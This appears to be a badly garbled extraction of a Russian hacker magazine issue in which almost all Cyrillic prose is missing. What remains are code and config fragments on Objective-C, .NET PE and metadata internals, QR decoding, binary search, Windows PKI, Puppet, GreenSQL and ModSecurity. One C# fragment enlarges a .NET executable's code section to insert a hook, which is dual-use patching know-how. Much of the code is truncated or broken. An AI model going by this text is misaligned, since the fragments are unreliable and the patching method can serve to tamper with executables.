elementsForName: @"Valute"];
if (dayly_values == nil)
{
//
return -1;
}
// CharCode
// Value ()
for (int i = 0; i < [nodes count]; ++i)
{
NSXMLElement * valute =
(NSXMLElement *)[nodes objectAtIndex: i];
// ? :)
NSLog([dayly_values getValueForCharCode:@USD]);
[pool release]; // ,
// .
return 0;
NSArray * names = nil;
Apple XCode 3,
XCode 4 Apple. , , , ...
-, , . , Objective-C.
098
Objective-C , .
h, m.
, -,
, , ,
, , .
X 12 /143/ 10
>> coding
// , ,
// -
- (void) setAge: (int) age
{
Age = age;
}
- (int) getAge
{
return Age;
}
@end
Cocoa
[my_class_pointer message_name: arg1 arg2_name: arg2

arg3_name: arg3]
:
[dog1 setAge: 3];
C++ Java,
. ,
(nil). nil.
,
- ,
.
, , . Objective-C
. ,
.
Dog, :
Dog * dog1 = [[Dog alloc] init];
ObjC .

// Dog NSObject
// Dog.h
@interface Dog : NSObject
{
//
@private
int Age;
@public
int Color;
}
// ,
// .
// -,
//
// ( C++) +.
//
// ,
// .
- (void) voice;
- (void) setAge: (int) age;
- (int) getAge;
@end
// (Dog.m)
@implementation Dog
- (void) voice
{
NSLog(@"Woof woof");
}
X 12 /143/ 10
alloc NSObject.
.
,
init.
alloc init, NSObject.
init , - . init ObjC.
Cocoa Framework
Cocoa Objective-, Mac OS X .
Cocoa ObjC,
Objective-C. ocoa Linux
Windows GNUStep cocotron.
Carbon Framework
Carbon Mac OS X, C/C++.
Mac OS (, Mac OS 9).
Carbon
Mac OS X . , , GUI Carbon 64- Apple
Cocoa.
099
CODING
, ,
:
int age = [dog1 getAge];
[dog1 voce];
,
() , release:
[dog release];
ObjC .
alloc , .
release 1.
, 0. COM, .
, retain. , Objective-C 2.0, ,
. ,
(NSAutoreleasePool), autorelease. , , Cocoa
( stringByAppendingString NSString, ).
NSAutoreleasePool *pool;
pool = [[NSAutoreleasePool alloc] init];
NSString *str;
//
// pool
str = [[[NSString alloc] init] autorelease];
// ...
[pool drain]; // str
ObjC , ,
Objective-C.
.
C
(errno ).
,
.

, . , ObjC, C++,
.
ObjC:
Objective-C
Cup * cup = [[Cup alloc] init];
@try
{
[cup fill];
}
@catch ( NSException * exc )
{
NSLog ( @"Exception caught: %@", exc );
}
@finally
{
[cup release];
}
100
,
. , , .
Objective-C
.
?
, .
Cocoa Carbon.
iOS Objective-C,
Cocoa.
Cocoa NeXTSTEP
OPENSTEP, NeXT.
Mac OS X, ,
. , #
Java, NSObject.
Cocoa , NSNumber
NSString, (NSArray, NSDictionary),
..
- Cocoa Objective-C
Cocoa-.
-.
, , XML.

,
. www.cbr.ru/scripts/XML_daily.asp XML :
<ValCurs Date="22.09.2010" name="Foreign Currency
Market">
<Valute ID="R01010">
<NumCode>036</NumCode>
<CharCode>AUD</CharCode>
<Nominal>1</Nominal>
<Value>29,4185</Value>
</Valute>
...
<Valute ID="R01020A">
<NumCode>944</NumCode>
<CharCode>AZN</CharCode>
<Nominal>1</Nominal>
<Value>38,6777</Value>
</Valute>
</ValCurs>
ObjC RCBDayly,
XML,
. .
, Cocoa XML.
, , POSIX,
GUI-, Cocoa .
- .
Apple
. ,
Mac OS X iOS ,
, Objective-C
. ! z
X 12 /143/ 10
CODING
stannic.man@gmail.com
... .
, .
, 75000 ,
, JIT ...
-, 75 # ,
.
.NET

.NET-
, ,

. , ,
, 20%
GalaxyS.

, .NET . .
API- ,
. , , ,
. ,
102
WinAPI-. .NET . .NET Framework.

, , .
.NET-
, . .NET!
X 12 /143/ 10
>> coding
HTTP://WWW
links
http://reflector.
red-gate.com
.NET
Reflector,
.NET,
.
DVD
dvd

,

.NET
Metadata Expert
,
Java .NET , Java-. .NET
Framework
.
,

. , .NET,
,
. ,
.NET,
, .
.NET
(Common Language Runtime CLR).
CLR
,
.
, CLR
.NET. , .NET
.NET Framework. , (Metadata) ,
, .NET.
, CLR
.
, .
Metadata
,
, .
X 12 /143/ 10
, , ,
, .NET-. Metadata,
,
(heaps) . Microsoft .NET
: #US, #Strings, #Blob #GUID #~.
#US- ,
. ,
Print("hello"), hello
#US-.
#Strings- ,
.
#Blob- ,
, , , .
#~- ,
.NET-. , AssemblyRef, MethodRef, MethodDef,
Param. AssemblyRef
, .
MethodRef , . MethodDef
, .
Param, , , ,
MethodDef.
?, . !
, , , :).
MethodDef.
.NET-
.
RVA
(relative virtual address) , ,
, #Blob
INFO
info

Metadata
.NET-

.NET Metadata
Expert
,

Microsoft
.NET Framework.
103
CODING
TPL
LINQ
ADO.NET
Entity Framework
WPF
(Avalon)
WCS
(InfoCard)
WF
(Workflow)
.NET
Framework
2.0
Base Class Library
3.0
WCF
(Indigo)
3.5
PLINQ
Common Language Runtime (CLR)

.NET
Param, ,
. RVA
( IL-) .TEXT.
(calling
convention), ..
, rsdn.ru .NET, (http://www.rsdn.ru/article/
dotnet/refl.xml, /phmetadata.xml, /dne.xml).
(BCL)
Main() .NET-. Main()
, Main() mscorwks.dll . Mscorwks.dll
JITFunction, JIT mscorjit.dll.
IL-
native-, Main(),
.
, -! .NET. ,
,
-, .
.NET -.
,
, , ,
.TEXT. , .TEXT
.NET
.
- , ( CALL
JUMP RVA-) ,
?
CALL JUMP MSIL- () , . ,
, , .
,
.TEXT .
. :

.NET-.
.NET- :
Mscoree.dll ( .NET)
Mscorwks.dll (where most of the stuff happens)
Mscorjit.dll ( JIT)
Mscorsn.dll ( )
Mscorlib.dll (Base Class Library )
Fushion.dll (assembly binding)
.NET- . _CorExeMain,
.
_CorExeMain, , mscoree.dll,
.NET-.
Mscoree.dll _CorExeMain mscorwks.dll.
Mscorwks.dll ,
. -
104
? !
X 12 /143/ 10
>> coding
MSDOS
PE
PE-,
.NET-
(.TEXT),
Metadata
(.DATA .RSRC)

(.RELOC .RDATA)
.NET
, . , , . -,
.
-,
.
RVA MethodDef
, . .TEXT ,
.
, raw- . , , raw , .
, ,
.
, , .TEXT
0x1000,
.TEXT, . , raw- 0x200,
, .TEXT
0x200.
, .TEXT ( ),
,
.TEXT ,
. PE-. ,
, .
, , , ,
.NET-,
CLIHeader,
, , , Metadata.
- :
X 12 /143/ 10
CLIHEADER C#
FileReader Input = new FileReader(AssemblyPath);
byte[] Buffer = Input.Read();
[skip...]
ImageBase = Marshal.AllocHGlobal(Buffer.Length * 2);
HeaderOffset = *((UInt32 *)(ImageBase + 60));
PE = (PEHeader *)(ImageBase + HeaderOffset);
HeaderOffset += (UInt32)sizeof(PEHeader);
StandardHeader = (PEStandardHeader *)(ImageBase +
HeaderOffset);
RVA *CLIHeaderRVA = (RVA *)((byte *) StandardHeader
+ 208);
SectionOffset = GetSectionOffset(CLIHeaderRVA->
Address);
CLI = (CLIHeader *)(ImageBase + CLIHeaderRVA->Address
- SectionOffset);
MetaDataHeader = (MetaDataHeader *)(ImageBase +
CLI->MetaData.Address - SectionOffset);
metadata = new MetaData(Function, ImageBase,
(Int32)CLI->MetaData.Address, MetaDataHeader,
CLI->MetaData.Size);
, ,
PE-
.
.TEXT ,
, ,
PE-:
VirtualSize = TextSectionHeader->VirtualSize
+ HookSize;
RawDataSize = VirtualSize;
if ((RawDataSize % FileAlignment) != 0)
RawDataSize += (FileAlignment (RawDataSize % FileAlignment));
StandardHeader->CodeSize = RawDataSize;
HookAddress = TextSectionHeader->VirtualAddress
+ TextSectionHeader->VirtualSize;
TextSectionHeader->VirtualSize = VirtualSize;
TextSectionHeader->RawDataSize = RawDataSize;
[skip...]
StandardHeader->DataBase = DataSectionHeader->
VirtualAddress;
StandardHeader->ImageSize = SectionHeader->
VirtualAddress + SectionHeader->VirtualSize;
if ((StandardHeader->ImageSize % SectionAlignment) != 0)
StandardHeader->ImageSize +=
(SectionAlignment (StandardHeader->ImageSize % SectionAlignment));
. , 75 , , .
:). , ,
.
,
.NET , . , , RTFM .
,
, .
, .NET-
.z
105
CODING
c0n Difesa http://twitter.com/difezza, http://defec.ru

QR-

.
.
:
.
, .
-
. -
,
- .
(-, , ..)
.
,
.
, ,
( 30 ), .

-, ,
,
. ,
106
.
,
, , , ,

.
. . .
, . ,
:
1) (). ( ).
2) . :
2.1) (stacked);
2.2) (matrix).
,
. ,
X 12 /143/ 10
>> coding
INFO

Xakep Online: http://xakep.ru
PDF417.

, ,
, ,
.
QR-.
(
, , ,
)
, , . , QR
. quick response,
.

QR- . , ,
,
QR-.
QR-,
(
PrintScreen, ), , :
Xakep Online: http://xakep.ru
(
-,
..), .
QR-
, . , ,
,
, .

,

. ,
, ,
.
, QR- ,
, ,
, .
X 12 /143/ 10

.NET C#.

, . ,
.NET Framework
.
, .NET Compact Framework, , .
:
Microsoft .NET Compact Framework
.NET Framework,

.
, QR- .
.NET Framework
.

- , (
, QR).
/
. SDK
: Windows,
*NIX, Windows Mobile, Symbian iPhone (Mac OS).
Windows,
Windows Mobile SDK (.dll), .NET/VC/VB.
QRCode DataMatrix
PDF417.
,
.
, ,
, QR-.
, ,
info
,
, QR-:
7089

( )
4296

2953
1817
HTTP://WWW
links
http://www.partitek.
com/
-
SDK.
http://qrcoder.ru/

QR-.
http://www.xakep.
ru/magazine/
xa/084/056/2.asp

-.
http://defec.ru
,

.
DVD
dvd

107
CODING
-,

: , , ,
. PTIMAGE.
,
unsafe public struct PTIMAGE
{
public int dwWidth;//
public int dwHeight;//
public byte* pBits;//
public byte* pPalette;//

(1,4,8 )
public short wBitsPerPixel; //
}
SDK .
,
, .
,
, SDK.
.
PTDECODEPARA:
PTDECODEPARA
public unsafe struct PTDECODEPARA
{
public int dwStartX;// X
public int dwStartY;
public int dwEndX;
public int dwEndY;
public int dwMaxCount;//
; 0,

};
dwMaxCount, ,

108
QR- ,

.
, :
PTBARCODEINFO

public unsafe struct PTBARCODEINFO
{
/* */
public int dwX1, dwY1;
public byte* pData; // ,

public int dwDataLen; // ( )
};
QR-,

, ,
QR-.
, , :
static void Main(string[] args)
{
PtQRDecodeRegister("12345678901234567890");//

PtInitImage(ref image); //
if (OpenFileDlg.FileName != "")
{
FileName = OpenFileDlg.FileName;
DecodeQR();
}
}
X 12 /143/ 10
>> coding

QR-
, DecodeQR(), QR- ,
, , ,
:
. - .
QR-
;
QR-
.
3D : QR-
.
, , .
,
/.
static private void DecodeQR()

{
/*
*/
if (PtLoadImage(FileName, ref image, 0) ==
PT_IMAGERW_SUCCESS)
{
if (PtQRDecode(ref image, ref DecodePara,
ref BarCodeInfo) != PT_QRDECODE_SUCCESS)
MessageBox.Show("An error occured while
rocognition ");
else
ShowBarCodeInfo(ref BarCodeInfo);//
-
}
}
// -,
QR-
static public unsafe void ShowBarCodeInfo(
ref PTTOTALBARCODEINFO BarCodeInfo)
{
if (BarCodeInfo.dwTotalCount <= 0)
{
MessageBox.Show("No barcode was found");
return;
}
string str = "";
//
{
str = str+Encoding.Default.GetString(byteArray);
//Encoding.GetEncoding("GB2312").GetString
str = str + "\n\n";
}
str = str + \0;
MessageBox.Show(str);
}
X 12 /143/ 10
.Decode()
QR-
.
( -
, -
, , .)
, , .

, ,
.

. , , , - (, ,
, QR-, ), QR- , .

, .
, . ,
QR- - . ,
, , . , .z
109
CODING
deeonis deeonis@gmail.com
,
. .
, ,
,
.
; , ,
BAD-DOMAIN.COM, , .
, ,
.
. , , ,
.

.
aka
, ,
.
, ,
, , .
.
m 0 n.
, , ,
m, ,
, m.
,
. :

int LinearSearch (int *array,
size_t arraySize, int key)
{
for (size_t i = 0; i < arraySize; i++)
if (array[i] == key)
return array[i];
//
return -1;
}
, n ,
. , O(n). ,
.
. ,
110
,
. , . :

cookie.
- .
.
- .

. , ,
.

, -: ,
3000 , 3000 ,
3000*3000=9 000 000 . ,
,
, , .

. .
O(log n).
10 431 (log(3000)
* 3000 = 10431.4). 863 ,
. , !
20% - Opera Google Chrome
. -?
, , , .
, aaa < aab < baa
< bba < bbb < bbc < caa...
.
.
.
, , . ,
n ,
n/2.
,
, .
, .
:
X 12 /143/ 10
.

int CCookieRemover::lowerbound(const CStringArray& a,
const int& n, const CString& t)
{
int result;
int l;
int half;
int first;
int middle;
l = n;
first = 0;
while(l>0)
{
half = l/2;
middle = first+half;
if( a[middle]<t )
{
first = middle+1;
l = l-half-1;
}
else
{
l = half;
}
X 12 /143/ 10
}
result = first;
return result;
}
.
,
, .
,
.
, 10 000
. ,
, .

, .

() . , , , .
.
. , .
111
CODING

,
. ,
. ,
, . , , ,
. , X
X, .
{data, left, right}. data , left right
.
. data
,
.
. , K T
:

1. , , ,
;
2. , K X:
2.1. K = X,
;
2.2. K > X, K
;
2.3. K < X, K .

.
,
. , K T n, :

1. T , ;
2. , K X
n;
2.1. K > X, K
;
2.2. K < X, K ;
2.3. K = X, :
2.3.1. ,
112
;
2.3.2. ,
m , ,
, m;
2.3.3. , :
2.3.3.1. m,
Right(n);
2.3.3.2. Left(m) Left(n);
2.3.3.3. n Parent(n)
Right(n);
2.3.3.4. , n.
, , .
. , ,
,
. ,
, .
.
, .
, . , ,

. z
,
, .
, ,
.
.

C
. , , , ,
.
X 12 /143/ 10
, !
- Amazon.com , , . ,
. : e-ink reader
. 7 ,
Wexler.
Epson Display
6
800 600

E-Ink 16
.

,

.

Wexler

. ,
FM

.

2
,

micro-SD
10 . Li-ion
1500 mAh

11 . .

. Wexler

FB2, EPUB, PDF,
HTML, TXT. ,

,
.

.

.

.
7000 .

: ARM9
: TXT, EPUB, RTF, HTM, HTML, PDF, Fb2
: JPG, JPEG, BMP, GIF
: mp3 (32kbps-384kbps), wma (32kbps192kbps)
:
: 65x126,5x9,5
: 215
www.wexler.ru
SYN/ACK
luchnik@it-university.ru

Windows Server 2008.
IT , .
, . -
,
. PKI
, ,
.

Windows Server 2008.
, ,
, ,
, , ,
, .
; , , .
, ,
: , ,
, ,
, .
.
X.509, . , ,
.
(Public Key Infrastructure (PKI))
,
, .
, PKI, :
, , ;
, , .
PKI,
.
(Certificate Policy) (Certificate
Practice Statements) .
,
,
114
, , .
,
(, HSM Hardware Security Module).
, , ( ).
.

,
, .
,
, . , ,
e-mail,
.
, .
,
,
-.
,
. ( ,
) .
.
, ,
,
.
,

.
X 12 /143/ 10
,
,
, OCPS (Online Certificate Status Protocol).
,
OCSP responder
. ,
,
, (
, ,
, -- ).
PKI . ,
. , ,
HTTPS.
, ,
, . SSL-. ,
,
, , ,
.
, .

. ,
- ? , ,

. ? :
,
.
.
, 1
1, 1.
,
PKI,

,

X 12 /143/ 10
. ,
,
, Konqueror Google Chrome.
,
, .
,
.
SSL-
- . , ,
.
- ( 1
2 ),
.
( ):
(Bridge CA Model).
() , .

-.
US governments Federal Bridge Certification Authority.
, n2
-. -
, .
, , ,
. , . ,
() ,
, . ,

.
, .
,
. Windows Server 2008
Active Directory
Certificate Services.
.
115
SYN/ACK

(Enterprise Standalone)
. , Enterprise CA
. Standalone
, , .
Standalone , Offline Root CA,
.
Root CA Subordinate CA. Root CA
, Subordinate CA .
, , .
: ,
WinXP SP2 Server 2003 SP2 SHA2 ,

Server 2003 SP2
KB938397,
Windows Update,
.

.
,
. Windows Server 2008 R2
,
, ,
,
.
, , ,
Offline, .
Standalone CA.
, ,
.
,
. ,
.
AIA CDP
,
. (Certificate
Revocation List (CRL)) CRL
Distribution Points (CDP) Authority Information Access (AIA) -
116
AD CS
AD CS
. ,
, (, HTTP,
LDAP FTP).

,
,
, , .
, . ,
,
, ,
,
, ,
.
, .
,
(data recovery agent).

.

(key
recovery agent),
.
X 12 /143/ 10
.
1-2 , Subordinate Issuing CA 5 ,
NAP , .

, , ,
.
, .
,
PKI. 4096
, , , , , .
,
. ,
,
, ,
.
( )
( ).
.
, , ,
().
, .
, ,
.
.
,

, . .

. , -
, , ,
.
(, CBC-MAC
HMAC), ,
, ,
.
,
, ,
. ,
,
, .
X 12 /143/ 10
AIA CDP
.
, ,
,
. ,
SHA1 ,
- , SHA2. , WinXP SP2
Server 2003 SP2 SHA2 ,
Server 2003 SP2 KB938397,
Windows Update, .
,
, Windows
Server 2008.
,
, . ,
,
.

. , ,
.
.
, .
, :
Issuing CA , Certpublishers
.
HSM-,
.
Enterprise Admin AD.
Stand-Alone Root CA,
Offline, CAPolicy.Inf,
AIA CDP
.
117
SYN/ACK
NATHAN BINKERT / NAT@SYNACK.RU /
. 2

http://
technet.microsoft.com/en-us/library/cc780454(WS.10).
aspx
A.K. Lenstra, E.R. Verheul
Selecting
cryptographic key sizes (http://www.win.tue.
nl/~klenstra/key.pdf). http://www.keylength.
com/en/ ,
, ,
.
PKCS (http://www.rsa.com/rsalabs/node.
asp?id=2124) X.509 (http://www.itu.int/rec/T-RECX.509/en)
, CApolicy.inf http://
blogs.technet.com/b/askds/archive/2009/10/15/windowsserver-2008-r2-capolicy-inf-syntax.aspx
PKI
whitepapers Windows PKI blog http://blogs.
technet.com/b/pki/
. !
3.
CRL
CAPolicy.Inf
CRLPeriodUnits = 60
CRLPeriod = Days
CRLOverlapUnits = 1
CRLOverlapPeriod = Weeks
CRLDeltaPeriodUnits = 0
CRLDeltaPeriod = Hours
.
,
, , . CAPolicy.Inf %SystemRoot%,
.
:
CDP AIA ,
,
. Extensions
Certification Authority. CRL,

118
X 12 /143/ 10
1. CAPolicy.Inf

[Version]
Signature= "$Windows NT$"
[Certsrv_Server]
RenewalKeyLength=2048
RenewalValidityPeriod=Years
RenewalValidityPeriodUnits=20
[CRLDistributionPoint]
[AuthorityInformationAccess]
2.
CRL
certutil
certutil
certutil
certutil
certutil
certutil
certutil
-setreg
-setreg
-setreg
-setreg
-setreg
-setreg
,
.z
CA\CRLPeriodUnits 60
CA\CRLPeriod "Days"
CA\CRLOverlapUnits 1
CA\CRLOverlapPeriod "Weeks"
CA\CRLDeltaPeriodUnits 0
CA\CRLDeltaPeriod "Hours"
Bridge A
A
, Include in the CDP
(AIA) extension of issued certificates .
CDP AIA certutil.
.
CRL ,
online, CRL ,
CDP. CRL
Revoked Certificates Certification Authority certutil ( 2)
CAPolicy.Inf [certsrv_server] ( 3).
, .
, , .
.
Issuing Enterprise CA, Stand-Alone Root CA.
.
,
, Certification Authority Submit new request
Action .
,
Pending Requests. .
,
, , .
A
-
, PKI, ,
,
X 12 /143/ 10
119
SYN/ACK
zobnin@gmail.com
Master
of puppets

Puppet

UNIX- Cfengine,
.
, Cfengine, ,
Puppet.
,
- ,
UNIX.
, ,
, .
, ,
- . :
?
SSH
. . -,
. -, (,
OpenOffice.org ,
).
, ,

. .
, ;

, ,
. , .

, Cfengine Puppet.

,
(,
, ,
,
..).

.
,
.
Puppet?
Cfengine,
Puppet, . Puppet
(Luke Kanies), Cfengine
. Cfenfine,
Puppet .
120
Puppet ,
,
. Puppet
, , ,
(, ,
, , ,
). Puppet Ruby,

( ).
, Cfengine,
, Puppet , ,
.
Puppet . Cfengine,
UNIX- ( MacOS X),
Cygwin Windows. Ruby Factor,
(
, Cfengine ).
Cfengne, Puppet - ,
.
( Puppet
) . ( )
,
, , /
, ,
. ,
, ,
( , ). Puppet ,
. ,
Debian/Ubuntu Puppet :
$ sudo apt-get install puppet
:
$ sudo apt-get install puppet puppetmaster
X 12 /143/ 10

/etc/puppet.
/etc/puppet/manifests/site.pp,
.

.
:
# vi /etc/puppet/manifests/site.pp
class passwd {
file { "/etc/passwd":
owner => root,
group => root,
mode => 644,
}
}
node default {
include passwd
}
, /etc/passwd root,
644.
.
/etc/puppet/puppet.conf.
,
,
Puppet. Ubuntu .
:
# (
)
pluginsync=true
# ( )
templatedir=$confdir/templates
# etckeeper
# ( , )
prerun_command=/etc/puppet/etckeeper-commitpre
postrun_command=/etc/puppet/etckeeper-commitpost

, , :
$ sudo puppetmasterd -genconfig > /etc/puppet/
puppetd.conf.default
HTTP://WWW
links
http://docs.
puppetlabs.com
Puppet
http://docs.
puppetlabs.com/
guides/language_
tutorial.html
Puppet
http://docs.
puppetlabs.com/
references/stable/
type.html
$ sudo puppet -genconfig > /etc/puppet/puppetd.

conf.default
fileserver.conf auth.conf
(
) .
.
Puppet :
$ sudo /etc/init.d/puppetmaster restart
# vi /etc/puppet/puppet.conf
[main]
#
logdir=/var/log/puppet
vardir=/var/lib/puppet
ssldir=/var/lib/puppet/ssl
rundir=/var/run/puppet
# Facter,
#
factpath=$vardir/lib/facter
#
X 12 /143/ 10

.

.
Puppet
,
(,
shmux):
121
SYN/ACK
,
Puppet

facter
$ sudo puppetd -server puppet-.com -verbose -test
,
:
$ sudo puppetca --list
:
$ sudo puppetca --sign nomad.grinder.com
PuppetLabs
:
$ sudo puppetca --sign --all
. Puppet- (
puppet):
$ sudo su
# echo '[puppet]' >> /etc/puppet/puppet.conf
# echo 'server=puppet-.com' >> /etc/puppet/puppet.conf
# exit
. /etc/passwd .
file ,
. owner => "root"
owner root, ,
(owner) .

, -, .
.
.
/etc/group, /etc/passwd ( - require):
:
$ sudo /etc/init.d/puppet start
, Puppet
,
,
, . , , ,
. bash, Puppet.
, ,
. ,
/etc/passwd:
owner => "root"
}
file . ,
, , ,
122
file { "/etc/group":
require => File["/etc/passwd"],
owner => "root",
}
, /etc/group ( ) ,
/etc/passwd.
, . ,
. ,
- nginx
:
class nginx {
package { "nginx":
ensure => installed
}
service { "nginx":
ensure => running,
require => Package["nginx"],
X 12 /143/ 10
INFO
package
nginx , service . require
, . ,
:
info
Puppet
HTTP,

-.
service { "squid":
ensure => running,
require => Class["nginx"],
}
-,
:
Puppet
class passwd {
owner => "root",
group => "root",
}
}
class passwd-bsd inherits passwd {
File["/etc/passwd"] { group => "wheel" }
}
passwd-bsd passwd ,
group /etc/passwd (
BSD- /etc/passwd wheel, ).

.
, Puppet
. $
, (true, false):
$want_apache = true
$apache_version = "2.2.14"
Puppet,
, facter.
, ,
-, Puppet .
Puppet
.
, passwd
( ):
owner => "root",
group => $kernel ? {
Linux => "root",
FreeBSD => "wheel",
},
}
X 12 /143/ 10
,
, group
root, wheel. ,
Puppet case,

:
case $operatingsystem {
redhat: { service { "httpd": ensure => running }}
debian: { service { "apache": ensure => running }}
default: { service { "apache2": ensure =>
running }}
}

service (
Linux , , Puppet,
).
default ,
.
file, package service, Puppet , . ,
, ,
http://docs.
puppetlabs.com/references/stable/type.html.
:
Puppet
cron cron
exec
file
filebucket
group
host /etc/hosts
interface
mount
notify - Puppet
package
Puppet

.
Puppet,

(pxe-install) ,

,

.
Puppet
, Google,
Fedora Project,
Stanford University,
Red Hat, Siemens IT
Solution
SugarCRM.
WARNING
warning

Puppet
8140,

.

, Puppet

,
Cfengine, (
20 ).
123
SYN/ACK
NATHAN BINKERT / NAT@SYNACK.RU /
service
sshkey SSH
tidy
user
zones Solaris
Puppet
(nodes). ,
. ,
, Puppet.
:
node default {
include passwd
}
default, /
passwd. default , /
passwd, - ,
. include
,
, . default (
),
(
). ,
, Puppet, (-
NTP-):
# SSH-
class sshd {
package { openssh-server: ensure => installed }
service { sshd:
name => $operatingsystem ? {
fedora => "sshd",
debian => "ssh",
default => "sshd",
},
enable => true,
ensure => running,
}
}
# Apache
class httpd {
package { httpd: ensure => installed }
service { httpd:
enable => true,
ensure => running,
}
}
# NTP-
class ntpd {
package { ntp-server: ensure => installed }
service {
ntp-server:
enable => true,
ensure => running,
}
}
# , -
124
node base {
include sshd
}
# , -
node web.server.com inherits base {
inlude httpd
}
# NTP-
node ntp.server.com inherits base {
include ntpd
}
: Apache web.server.com
NTP- ntp.server.com. SSH-.
;
, , Puppet.
Puppet.
,
( , Puppet ,
).

.
, - Apache, ,
, .
, Puppet
.
/etc/puppet/fileserver.
conf. Puppet , :
# vi /etc/puppet/fileserver.conf
[files]
path = /var/puppet/files
allow *.server.com
, /var/puppet/files
server.com. ,
IP-,
deny.

file. :
file { "/etc/httpd/conf/httpd.conf":
source => "puppet://httpd/httpd.conf",
mode => 644,
}
httpd.conf, /var/puppet/
files/httpd, ,
.

Puppet. ,
. , Puppet
, ,
.!z
X 12 /143/ 10
WEXLER.HOME 903
>> coding

,
( , ). , ,
. handycraft' , . ,
,
.
. WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.
. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903
Windows 7 .
64- :
4
. ,
Microsoft Office starter ( Word Excel)
Microsoft Security Essentials.
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
SYN/ACK
grinder grinder@tux.in.ua

-
,
, .
( )
. .
, , .
, .
GreenSQL-FW
-
- , .
(XSS, SQL-injection, XPath-injections, CSRF/XSRF,
HTTP Response Splitting, Include- )
,
.
, -
. , .
,
,
, . ,
AppArmor, SELinux TOMOYO Linux (][ 08.2010),

. .
GreenSQL-FW (greensql.net), ,
- - SQL-,
SQL- SQL-,
(DROP, CREATE ..).
GreenSQL,
DELETE, UPDATE INSERT,
, ID . ,
. ,
,
: , , TRUE,
, OR, .
, .
GreenSQL :
Simulation Mode (IDS), SQL-
;
Blocking Suspicious Commands ,
(IPS) ,
;
Active protection from unknown queries (db firewall);
126
Learning mode , .

Learning mode, GreenSQL
Active protection.
: Community, Light
Pro. ( GNU GPL)
, MySQL PostgreSQL
( 1.2) Linux. ,
, MS SQL Server
Win2k3/2k8.

, CMS , . GreenSQL , SQL-, .
GreenSQL 127.0.0.1:3305,
SQL- MySQL
127.0.0.1:3306.
.
-.
.
GreenSQL Community.
Ubuntu, RHEL/CentOS 5,
Fedora, Debian, SLE/openSUSE Mandriva. Ubuntu
: deb-, ,
:
$ sudo dpkg -i greensql-fw_1.2.2_amd64.deb
, GreenSQL, IP- , , root,

, .

. , ,
:
$ sudo dpkg-reconfigure greensql-fw
, greensql-create-db.
GreenSQL /etc/
greensq. greensql.conf
X 12 /143/ 10
,
.

,
, (/var/log/
greensql.log) .
,
.
, GreenSQL, : 3305 , 3306,
MySQL.
$ sudo nano /usr/share/greensql-fw/config.php

$db_type = "mysql";
$db_host = "localhost";
$dbport=3306
$db_name = "greendb";
$db_user = "green";
$db_pass = "pwd";
mod_alias -:
$ sudo a2enmod alias
$ sudo service apache2 restart
$ mysql -h 127.0.0.1 -P 3305 -u root -p
, , , show databases
.
, ,
3305, ,
GreenSQL 3306,
3305.
.
-. ,
/etc/greensql/greensql-apache.conf :
$ sudo nano /etc/apache2/apache2.conf
Include /etc/greensql/greensql-apache.conf
greensql-apache.conf :
$ sudo nano /etc/greensql/greensql-apache.conf
#
<IfModule mod_alias.c>
Alias /greensql "/usr/share/greensql-fw"
</IfModule>
templates_c:
$ sudo chmod 0777 /usr/share/greensql-fw/
templates_c
config.php
:
X 12 /143/ 10
-, admin pwd.

ModSecurity
- , ,
-. ,
. WASC (Web Application Security Consortium, webappsec.
org) ,
,
-, . , WASC
, . - ModSecurity
(modsecurity.org) WebDefend (breach.com) ,
, . , . (
2003 ) OpenSource-,
.
ModSecurity -
Apache 2.0/2.2,
.
, .

, ,
, .
ModSecurity
HTTP://WWW
links

GreenSQL-FW
greensql.net
WASC
webappsec.org
ModSecurity
modsecurity.org
OWASP
ModSecurity ore
Rule Set owasp.
org/index.php/
Category:OWASP_
ModSecurity_Core_
Rule_Set_Project
suPHP
suphp.org

htscanner pecl.
php.net/package/
htscanner

Suhosin hardenedphp.net/suhosin
127
SYN/ACK
GreenSQL
- . ,
, ModSecurity.
ModSecurity
, . , OWASP ore Rule
Set (CRS, owasp.org/index.php/Category:OWASP_ModSecurity_Core_
Rule_Set_Project),
- (0-day)
. CRS HTTP, ,
,
. Rules
Subscription Service. ClamAV.
( ) ,
Enhanced Rule Set (ERS),
(IIS, Outlook Web Access .),
PCI DSS (Payment Card Industry Data Security Standard),

.
ModSecurity 2.5.12,
,
, HTML-
(Content Injection),
( @verifyCC), XSS
PDF-. :
skipAfter, SecMarker, ctl:ruleRemoveById (
), GEO
, SecRuleScript, Lua. ,
rules-updater.pl,
.

Zorp
Syslog-NG,
(Balazs Scheidler), Zorp.
. Netfilter/iptables, Zorp , ,
. Zorp GPL (www.balabit.com)
GNU GPL.
GreenSQL
128
X 12 /143/ 10
Suhosin
ModSecurity .
Ubuntu:
$ sudo apt-cache search libapache-mod-security
| grep -i version
Version: 2.5.11-1
, , :
$ sudo apt-get install libapache-mod-security
,
, Debian, RHEL/CentOS, Fedora, Gentoo,
FreeBSD, Apache Windows . , ,
.

, . :
$ sudo apt-get build-dep libapache-modsecurity
ModSecurity unique-id,
Ubuntu :
$ sudo a2enmod unique_id
Apache - --enable-uniqueid --with-pcre. :

$ tar tar xzvf modsecurity-apache_2.5.12.tar.
gz
$ cd modsecurity-apache_2.5.12/apache2
$ ./configure
apxs (APache eXtenSion tool),

:
$ make
$ make test
All tests passed (576).
X 12 /143/ 10
Suhosin

ModSecurity Log Collector, make mlogc. :
INFO
$ sudo make install

:
$ sudo chmod 644 /usr/lib/apache2/modules/
mod_security2.so
-, :
info
AppArmor, SELinux
TOMOYO Linux

][ 08.2010

LoadFile /usr/lib/libxml2.so
LoadFile /usr/lib/liblua5.1.so
LoadModule security2_module modules/mod_
security2.so

ModSecurity.
,
, :
$ sudo cp modsecurity-apache_2.5.12/
modsecurity.conf-minimal /etc/apache2/mod_
security.conf

. ,
. ModSecurity
(modsecurity.org/documentation/modsecurityapache/2.5.12).
ModSecurity CRS,
OWASP ( 2.0.8, CVS). , , CRS base_rules
129
SYN/ACK
ModSecurity
optional_rules. /etc/apache2/
modsecurity :
$ sudo mkdir /etc/apache2/modsecurity
$ tar xzvf modsecurity-crs_2.0.8.tar.gz
$ sudo mv -v modsecurity-crs_2.0.8/* /etc/apache2/
modsecurity/
:
<IfModule security2_module>
Include modsecurity/*.conf
